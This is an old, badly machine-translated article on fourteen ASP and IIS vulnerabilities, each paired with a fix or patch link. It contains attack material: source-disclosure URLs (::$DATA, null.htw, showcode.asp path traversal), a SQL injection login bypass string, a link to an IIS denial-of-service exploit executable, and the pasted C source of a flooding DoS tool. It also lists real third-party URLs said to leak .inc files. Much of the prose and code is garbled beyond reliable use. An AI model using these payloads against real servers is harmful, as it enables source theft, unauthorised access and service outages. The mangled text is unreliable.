ASP vulnerability analysis and solution

xiaoxiao2021-03-06  74

ASP Vulnerability Analysis and Solution 1 After the ASP program adds a special symbol, you can see the affected version of the ASP source program: Win95 PWS IIS3.0 98 PWS4 does not exist this vulnerability. This loophole does not exist in IIS4.0 or more. Description of the problem: These special symbols include decimal points,% 81,:: $ data. For example: http://someurl/somepage.asp.http: // SomeURL / Somepage.asp% 81Http: // SomeURL / Somepage.asp :: $ dataHttp: // SomeURL / SomePage.asp% 2Ehttp: // SomeURL / SomePage% 2E% 41Sphttp: // SomeURL / SomePage% 2E% Asphttp: // SomeURL / SomePage.asp% 2EHTTP: //SOMEURL/MSADC/SAMPLES/SELECTOR/SHOWCODE.ASP? Source = / MSADC / Samples /../ ../../../../../../... IT.INI's file content) is then easy to see SomePage in the installation of IIS3.0 and Win95 PWS. ASP source program. What is the reason for this terrible vulnerability? The root cause is actually the Windows NT-specific file system is doing strange. One of the common sense knows that in NT provides a file system completely different from FAT: NTFS, this technique called new technology file system makes NT have a high security mechanism, but it is because It has produced a lot of hazardous hazards. Everyone may not know that NTFS supports multi-data streams contained in a file, and this main data stream containing all content is called "data", thus makes it in the browser

It is possible to directly access this feature of the NTFS system and capture the script in the file. However, the reason for: $ data is due to the problem of IIS when the file name is analyzed, it does not standardize the file name. Solutions and recommendations: If you are WinodWS NT users, install IIS4.0 or IIS5.0, Windows2000 does not exist. If you are Win95 users, install WIN98 and PWS4.0.

2 ACCESS MDB Database Multi-Vulnerability Description: When you use Access to make a background database, if someone knows or guesses the path of the server and the database name of the server, then he can download this Access database file. This is very dangerous. For example, if your Access database book.mdb is placed in the Database directory in the virtual directory, then someone is entered in the browser: http:// SomeURL / Database / book.mdb If your book.mdb database does not encrypt in advance If all important data in book.mdb, all important data is in the hands of others. Workaround: (1) For your database file name, a complex unconventional name is made and put him in a few directories. The so-called "unconventional", for example, if there is a database to save information about books, don't give him a "book.mdb" name, a weird name, such as D34ksfslf.mdb, then Put him in a few layers of directory such as ./kdslf/i44/studi/, this hacker wants to get your Access database file by guessing. (2) Do not write the database name in the program. Some people like to write DSN in the program, such as: dbpath = server.mappath ("cmddb.mdb") conn.open "driver = {Microsoft Access Driver (* .mdb)}; dbq =" & dbpath, if When people get the source program, your name of your Access database has a lot. So I suggest you set up a data source in ODBC, then write in the program: Conn.open "shujiyuan" (3) Use Access to encode and encrypt database file file. First, "Tools-> Security-> Encrypted / Decrypting Database, select the database (such as: EMPLOYER.MDB), then then then determine, then" Database Caused Save Save Save "window, save: Employer1.mdb. Employer.mdb will be encoded, then eMployer1.mdb .. It is important to note that the above action is not a password to the database, but only the database file is encoded, the purpose is to prevent others from using another tool to view The content of the database file. Next we are encrypted for the database, first open the encoded EMPLOYER1.MDB, select "exclusive" mode when open, then select the "Tools -> Security -> Setting Database Password" of the menu. Then enter the password. After setting the password for the Employer1.mdb, then if you use the Acces database file, Access will first require the password first, verify the correct database. But you want to be in the ASP program. In the Open method, the parameters of the PWD can be added, for example: param = "driver = {microsoft access driver = {microsoft access driver (* .mdb)}; pwd = yfdsfs" param = param & "; dbq =" & server.mappath ("employer1.mdb") Conn.open param This is even if someone gets an Employer1.mdb file, there is no password. He can't see Employer1.mdb.

3 Code.asp files Leak ASP code problem Description: A simple example, there is a .asp file in the ASP1.0 provided by Microsoft, specifically used to view the source code for other .asp files, this file For Aspsamp / Samples / Code.asp. If someone uploads this program to the server, he can easily view the procedures of others. For example: code.asp? Source = / directory / file.asp But this is a more old vulnerability, I believe this vulnerability now. The following is a comparison of new: http: //someurl/iissample/exair/howitworks/code.asp? /Lunwen/soushuo.asp=xxx.asp The biggest harm is that the ASA file can be read by the above manner; database password Exposing in the form of a hacker; problem resolution or suggestion: For the SHOW ASP Code of IIS, delete the file or disable access to this directory 4, FileSystemObject component Doctor Download any files on the FAT partition Download any file on the FAT partition. Vulnerability Problem Description: IIS3, IIS4 ASP file operations can be implemented through the FileSystemObject, including the read and write directory operation of the text file, copy of the file, but this powerful function has left a very dangerous "back door". Use FileSystemObjet to tamper with any files on the FAT partition. Even if the NTFS partition, if the permissions are not set, it can also destroy, and you may suffer from the disaster of the top. Unfortunately, a lot of WebMaster only knows that the web server is running, and rarely performs permission settings, and the default setting of NT directory permissions is low and terrible. So if you are a webmaster, it is recommended that you pay close attention to the server settings, try to build the web directory in the NTFS partition, do not set the Everyone Full Control, even if the member of the administrator group is generally there is nothing necessary, as long as there is Read, change the permissions is enough. You can also delete or rename the components of FileSystemObject.

5. Input standard HTML statement or JavaScript statement changes the output result problem description: What is the result of being entered in the standard HTML statement in the input box? For example, a message, we will join in the message: Hello! If you do not block the HTML statement in your ASP program, you will change the size of the "Hello" font. In the message, change the font size and the map sometimes not a bad thing, but it can make the message this vivid. But if you write a JavaScript cycle in the input box, such as: Extraordinary News So other guests viewing the message will move the mouse to "Extraordinary News", the user's browser will die due to dead cycles. Solutions and Suggestions: Write a similar program to prevent such operations, such as writing a program to determine the client's input, and block all HTML, JavaScript statements.

6, ASP program password verification Vulnerability Vulnerability Description: Many websites put the password into the database, with the following SQL in the login verification, (as an example) SQL = "SELECT * from user where username = '" & username & "' and pass = '"& pass &'" At this point, you can construct a special username and password according to SQL, such as: Ben 'or' 1 '=' 1, you can enter the page you don't have privilege. Let's see the statement above.吧: SQL = "SELECT * from user where username = '" & username "" At this point, you only need to construct a special username and password according to SQL, such as Ben' or '1' = '1, the program will become like this: SQL = "Select * from username where username =" & Ben'or'1' = 1 & "and pass =" & pass "or is a logical operator, the role is judging two When the condition is, as long as one of the conditions is established, the equation will be established. In the language, it is true (established) in 1. So in this line of statement, the "AND" verification of the original statement will no longer Continue, because the "1 = 1" and "OR" status return to true value. In addition, we can also construct the following username: username = 'aa' or usrname <> 'aa'pass =' ​​aa 'or pass < > 'AA' The corresponding user name box in the browser end: AA 'or usrname <> AA Password box Writes: AA' or Pass <> AA, pay attention to these two strings, two heads, no ' In this way, it can be successfully defrauding the system and enters. Although the latter method theory is, it is very difficult to practice, and the following two conditions must be available. 1. You must first know the system in the table. Which two fields are used to store usernames and passwords, only this can be accurately constructed of this offense string. In fact, this is a hard time. 2. The system does not validate the string you entered Check. Problem Solve and Recommendation: Processing of the input content verification and "'".

7, IIS4 or IIS5 installed with Index Server service Vulnerability ASP Source Problem Description: InDex Server running IIS4 or IIS5, enter a special character format to see a program of ASP source or other pages. Even the system has been added to the system of the patch of the source code, or there is no .htw file system, there is the same problem. Get an ASP program, even the source code of the global.asa file, undoubtedly a very significant security hazard. User passwords and IDs are often included in these codes, as well as the source path and name of the database. This is very important for the attacker to collect system information. By building the following special programs, you can see the program source code: http: //202.116.26.38/null.htw? CiWebhitsFile = / default.asp & custom = FULL This is just the file code of some HTML format, but when you add% Behind the parameters of CiWebhitsFile, as follows: http: //someurl/null.htw? CiWebhitsFile = / default.asp% 20 & Cirestriction = None & CiHILITYPE = FULL This will get the source code of the program. (Note: /Default.asp is calculated by the root of the web. Such as a site http: //welcome/welcome.asp is then: http: //someurl/null.htw? CiWebhitsFile = / welcome / welcome. ASP% 20 & CIRESTTION = None & CiHilittype = FULL) Since the 'null.htw' file is not a real system mapping file, it is just a virtual file stored in system memory. Even if you have removed all the true .htw files from your system, because the request for null.htw file is processed by WebHits.dll. Therefore, IIS still receives the threat of the vulnerability. Problem resolution or suggestion: If the function provided by the WebHits is that the system must, download the appropriate patch. If there is no need, use IIS's MMC management tool to simply remove the .htw image file. Patch as follows: Index Server 2.0: Intel: http: //www.microsoft.com/downloads/release.asp ReleaseID = 17727Alpha:? Http: //www.microsoft.com/downloads/release.asp ReleaseID = 17728Indexing Services? For Windows 2000: Intel: http://www.microsoft.com/downloads/release.asp? releaseid = 17726

8, bypass the verification directly into the ASP page. Vulnerability Description: If the user knows the path and file name of an ASP page, this file is to be verified, but the user directly enters the file name of this ASP page, it is possible to pass the verification. For example: I I tried this on some websites: First close all browsers, windows, enter: http: //someurl/system_search.asp? Page = 1 When you see that you can only see the system can see. Of course, some people will also add a judgment in the beginning of SYSTEM_SEARCH.ASP in order to prevent this, such as judge the session ("system_name"), if not empty, so that the above URL request cannot directly enter the administrator Page. However, this method also has a vulnerability. If the attacker first uses a legal account, or generates a session on this machine, such as session ("system_name") = "admi", because session ("system_name" is not empty This can also directly enter the password, directly into the administrator page. Workaround: Perform appropriate processing at the beginning of the ASP page that needs to be verified. For example: track the file name of the previous page, only the session that is transferred from the previous page can read this page. 9, IIS4.0 / 5.0 Special data format URL Remote DOS Attack Vulnerability Description: When there is an IIS4.0 or IIS5.0 web service, request a URL with special data format, will slow down attack The response speed of the web server may make it temporarily stopped. Affected versions: MicrosoftInternetInformationServer4.0MicrosoftInternetInformationServer5.0 vulnerability testing procedure is as follows: http: //202.96.168.51/download/exploits/iisdos.exe source code is as follows: http: //202.96.168.51/download/exploits/iisdos.zip test Procedure: Just to join: IISDOS <***. ***. **. **> Can attack the other party web server problem Solution: InternetInformationServer4.0: http://www.microsoft.com/downloads/release.asp ReleaseID = 20906InterNetInformationServer5.0: http://www.microsoft.com/downloads/release.asp? ReleaseID = 20904 More information: http://www.microsoft.com/technet/security/bulletin/ms00-030 .aspmicrosoft safety announcement MS00-021: http://www.microsoft.com/technet/security/bulletin/fq00-030.asp related connections http://www.ussrback.com

10. IIS Web Server DOS Vulnerability Description: By default, IIS is easy to be denied service attacks. If a key called "MaxClientRequestBuffer" in the registry is not created, attacks for this NT system can usually work. "MaxClientRequestBuffer" This button is used to set the IIS allowed the acceptable input. If "MaxClientRequestBuffer is set to 256 (bytes), the attacker will be restricted within 256 bytes by entering a large number of character requests IIS. The default setting of the system is not limited to this, so the following programs are utilized. You can easily implement DOS attacks on IIS Server: #include #include #define max_thread 666void cng (); char * server; char * buffer; int port; int counter = 0; int Current_threads = 0; int Main (int Argc, char ** argv) {Word TEQUILA; WSADATA DATA; INT P; DWORD TID; Handle Hthread [2000]; // This Code is as AND sucks as it is. Won't EXIT CORRECTLY AND A Lotof Other Fun Things./that I Didn't Want To Take The Time to Do. So Just Ctrl C Out of Thecode. //Load Up Cnghack.exe 3 Times for Charm.Printf ("CNG IIS) Dos./nmarc@eeye.com/nmarc@eeye.com/nmarc@"for mybeloved./"/n" ";if(arc< 2) {Printf ("usage:% s [server] [ Port] / n ", Argv [0]); EXIT (1);} buffer = malloc (17500); MEMSET (Buffer, 'A', Strlen (buffer); server = argv [1]; port = atoi ( Argv [2]); Tequila = MakeWord (1, 1); Printf ("Attempting to Start Winsock ..."); IF ((WSAStartup (Tequila, & Data))! = 0) {Printf ("Failed to Start Winsock ./n" "}}}}}}}}}}}} }phenter = 0; for (p = 0; p

Void CNG () {INT SOCKFD = 0, P; Struct SockAddr_in dstsain; char getkilled [] = "get / http // r / n"; int Die = 1; Printf ("Entered CNG / N"); Current_threads Dstsain.sin_Family = AF_INET; DSTSAIN.SIN_PORT = HTONS ((u_short) port); dstsain.sin_addr.s_addr = inet_addr (server); if (((Sockfd = socket (AF_INET, SOCK_STREAM, 0)) <0) {Printf "Failed to create socket / n"); - current_threads; return;}} if (! Connect, (Sterkfd)) & dstsain, sizeof (dstsain)) {P = send (Sockfd, getkilled, strlen (getkilled) , 0); Printf ("Step 1:% I / N", P); for (;;) {P = Send (SOCKFD, BUFFER, STRLEN (BUFFER), 0); Printf ("p:% I / N ", P); // put in some code to check if send = -1 more the x Times We Dropthe loop and exit the thread // Blalla Blane}} - current_threads; printf "EXITED CNG / N"); Return;} cnghack.c Works by doing the following: conne / http / [return] [buffer]

Where: [RETURN] IS JUST AN / R / N [Buffer] Is A NEVER Ending Stream of A'S

Result of the attack will cause CPU usage of 100% NT system solutions run Regedt32.exe in: adding a value HKEY_LOCAL_MACHINE / SYSTEM / CurrentControlSet / Services / w3svc / parameters: Value Name: MaxClientRequestBufferData Type: REG_DWORD set to decimal value is set to a specific The IIS you want to set is allowed to accept the maximum length of the URL. CNNS setting is 256

11. MS ODBC database connection overflow causes NT / 9X Deny Service Attack Vulnerability Description: The Microsoft ODBC database may have potential overflow issues (Microsoft Access Database) in connection and disconnection. If you do not cancel the connection, you can directly connect directly to the second database, it may cause the service to stop. Impact System: ODBC Version: 3.510.3711.0ODBC Access Drive Version: 3.51.1029.00OS version: Windows NT 4.0 Service Pack 5, IIS 4.0 (i386) Microsoft Office 97 Professional (mso97.dll: 8.0.0.3507) Vulnerability detection method is as follows: ODBC connection source name: MiscdBodbc database model: MS AccessoDBC assumptions Path: D: /DATA/Misc.mdbasp code as follows: <% set connvb = server.createObject ("adodb.connection") connvb.open "driver = {Microsoft Access Driver (* .mdb)}; DSN = Miscdb "%> ... lots of html removed ... <% set connglobal = server.createObject (" ADODB.Connection ") connGlobal.Open" DSN = miscdb; User = sa "mSQL =" arb SQL Statement "set rsGlobal = connGlobal.execute (mSQL) While not rsGlobal.eofResponse.Write rsGlobal (" resultfrommiscdb ") rsGlobal.movenextwend ' rsglobal = Nothing'Connglobal.close'Set CONNGLOBAL = Nothing 'Note We do not close close the connection%> <% set connglobal = Server.createObject ("AdoDb.Connection") connglobal.open "Driver = {Microsoft Access Driver (* .mdb)}; dbq = d: /data/misc.m db "mSQL =" arb SQL Statement "set rsGlobal = connGlobal.execute (mSQL) While not rsGlobal.eofResponse.Write rsGlobal (" resultfrommiscdb ") rsGlobal.movenextwendrsGlobal.closeset rsGlobal = nothingconnGlobal.closeset connGlobal = nothing 'Note we DO close the Connection%> In this case, the IIS processing process will be paused, and the CPU usage will reach 100% due to the INetInfo.exe process. Only restart your computer can be recovered.

12, ASP home page. INC file leak problem Vulnerability Description: Effected version: Any system remote: YES / Local: YES content summary: When there is an ASP home page is making the final debug completion, it can be Some search engines are added as search objects. If someone uses the search engine to find these pages, you will get the positioning of the file, and you can see the details of the database location and structure in the browser reveals the complete source code. The specific operation process is: - Use the search engine to find the "Microsoft VBScript runtime error Execute" ". Inc," keyword - The search engine will automatically find the included file (.inc) containing the ASP and display it to the user - Use the browser to view the source code containing files, which may have some sensitive information vulnerabilities: example: - http://shopping.altavista.com/inc/lib/prep.lib Exposure Database connection and nature, resource location , Small cake logic, server IP address - http://www.justshop.com/sflib/ship.inc Exposure Database Nature - http://www.bbclub.com:8013/includes/general.inc Exposion Cobranding- HTTP : //www.salest.com/corporate/admin/include/Jobs.inc Exposes the DataFile Location and Structure - http://www.bjsbabes.com/sflib/design.inc includes database structure for StoreFront 2000 Exposure Source code - HTTP : //www.ffg.com/scripts/issearch ".inc Exposure Search Engine Record File - http://www.wcastl.com/include/functions.inc Exposure Member Email Address - http://www.wcastl.com /FLAT/Comments.txt exposed Member Private annotation file - http://www.traveler.net/two/cookies.inc exposed cookie logic solution: - Search engine should not indefilled pages with an ASP runtime error It should be thoroughly debugged before the web page - security experts need to fix the ASP containing files to external users cannot see their ASP newsgroups, and the site provides two solutions to fix this vulnerability. First, encrypt the contents of .inc file content. Secondly, you can use the .asp file instead. INC file allows users to directly view the source code of the file directly from the browser. The file name of the .inc file is not used to use the system default or have a special meaning.

13. Using Activer Explorer to read and write a file to read and write a file: CHINAASP's Activer Server Explorer can easily view the name, size, type, modification time of the file on the server online to view the directory of the file online to view the name, size, type, modification time, and online editing. Text file, such as .txt, .htm, .asp, .pl, .cgi, etc., directly execute files on the server. Activer Server Explorer requires the relative path or absolute path, but if an attacker is uploaded to a directory on the target server, and this directory supports the ASP, then he can modify, execute it through Activer Server Explorer. Document on the target server. This situation can occur in an attacker with a writable directory account on the target NT server, and this directory supports ASP. For example, some personal free homepage servers that support the ASP, send Activer Explorer to the free homepage of the free home page, and then get the path to the target server through various methods, (such as vulnerability: "Request non-extension is IDQ Or IDA files will expose the physical address of the file on the server. "). Or directly in the relative path". ", Generally the default. Such an attacker can arbitrarily modify, perform files on the target server, whether he has no read access to this file. So those servers that offer personal homepage or other services with ASP services are docked. This kind of attack is docked. Vulnerability Solution In fact, Activer Server Explorer uses the above-mentioned vulnerability 4 FileSystemObject component tampering with the vulnerability of any file on the FAT partition. So how can we limit users using FileSystemObject objects? An extreme practice is to completely reverse registration to provide the component of the FileSystemObject object, that is, Scrrun.dll. The specific method is as follows: REGSVR32 /UC:/Windows/system/scrrun.dll under the MS-DOS Status (Note: To change the actual path to your local time), if this is, you can't use FileSystemObject Objects, sometimes using the FileSystemObject object to manage files is very convenient, what is the way to be two people? We can prevent others from illegally using the FileSystemObject object, but we can still use this object. The method is as follows: Find the hkey_classes_root / scripting.FileSystemObject key value to make it a string you want to become the string you want (right -> " rename "), such as changes become HKEY_CLASSES_ROOT / Scripting.FileSystemObject2 this way, so it is necessary to reference the object in the ASP: Set fso = CreateObject (" Scripting.FileSystemObject2 ") can not be used: Set fso = CreateObject (" Scripting.FileSystemObject " ) If you use the usual way to call the FileSystemObject object, you will not be able to use it. As long as you don't tell others this changed object name, others cannot use the FileSystemObject object.

In this way, as a site manager, we will put an illegal use of the FileSystemObject object, and we can still use this object to make it easy to implement the website online management! 14, IIS4.0 / IIS5.0 long file name request presence vulnerability vulnerability description: affected version: Microsoft IIS 5.0 Microsoft Windows NT 2000Microsoft IIS 4.0 Microsoft Windows NT 4.0 Microsoft BackOffice 4.0 Microsoft Windows NT 4.0 Microsoft Backoffice 4.0- Microsoft Windows NT 4.0 When adding 230 "% 20" after a known file name, add a .htr, the content of the file is installed with Microsoft IIS 4.0 / 5.0. This is caused by ISM.dll map. Such as http: // target / filename% 20 .htr This request is only when the .htr request is the first call or ism.dll Once loading, memory can work. Solution: install the patch: Microsoft IIS 5.0: http: //download.microsoft.com/download/win2000platform/Patch/Q249599/NT5/EN-US/Q249599_W2K_SP1_X86_en.EXEMicrosoft IIS 4.0: http: //download.microsoft.com/ Download / IIS40 / PATCH / Q260838 / NT4ALPHA / EN-US / ISMPST4I.EXE


New Post(0)